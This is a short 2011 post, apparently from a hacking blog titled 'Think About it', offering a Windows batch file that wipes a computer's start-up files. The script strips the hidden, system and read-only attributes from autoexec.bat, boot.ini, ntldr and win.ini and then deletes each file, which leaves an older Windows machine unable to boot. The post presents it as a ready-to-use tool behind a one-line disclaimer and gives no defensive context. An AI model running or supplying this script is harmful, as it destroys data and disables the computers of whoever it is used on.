Think About it......

"If you are a good hacker, everyone knows your name. If you are a great hacker, no one knows who you are."

Tuesday, February 1, 2011

Wipe BootUp files of System

Its a batch file that wipes that start-up files of a computer

-----Disclaimer -----

Not to be used to damage/harm other people’s computer systems

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

No comments:

Post a Comment